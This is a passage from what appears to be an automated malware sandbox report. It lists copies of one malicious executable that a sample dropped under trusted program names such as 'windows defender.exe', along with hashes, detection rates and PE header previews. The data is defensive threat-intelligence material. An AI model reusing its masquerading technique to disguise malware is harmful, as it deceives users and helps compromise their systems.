                                        C:\Users\user\OneDrive\google.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\internet explorer.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\internet explorer.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\java.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\java.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\jdownloader.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\jdownloader.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\microsoft office.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\microsoft office.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\microsoft.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\microsoft.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\microsoft.net.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\microsoft.net.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\mozilla maintenance service.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\mozilla maintenance service.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\msbuild.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\msbuild.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\msecache.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\msecache.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\reference assemblies.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\reference assemblies.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\windows defender.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\windows defender.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\windows mail.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\OneDrive\windows mail.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\OneDrive\windows media player.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
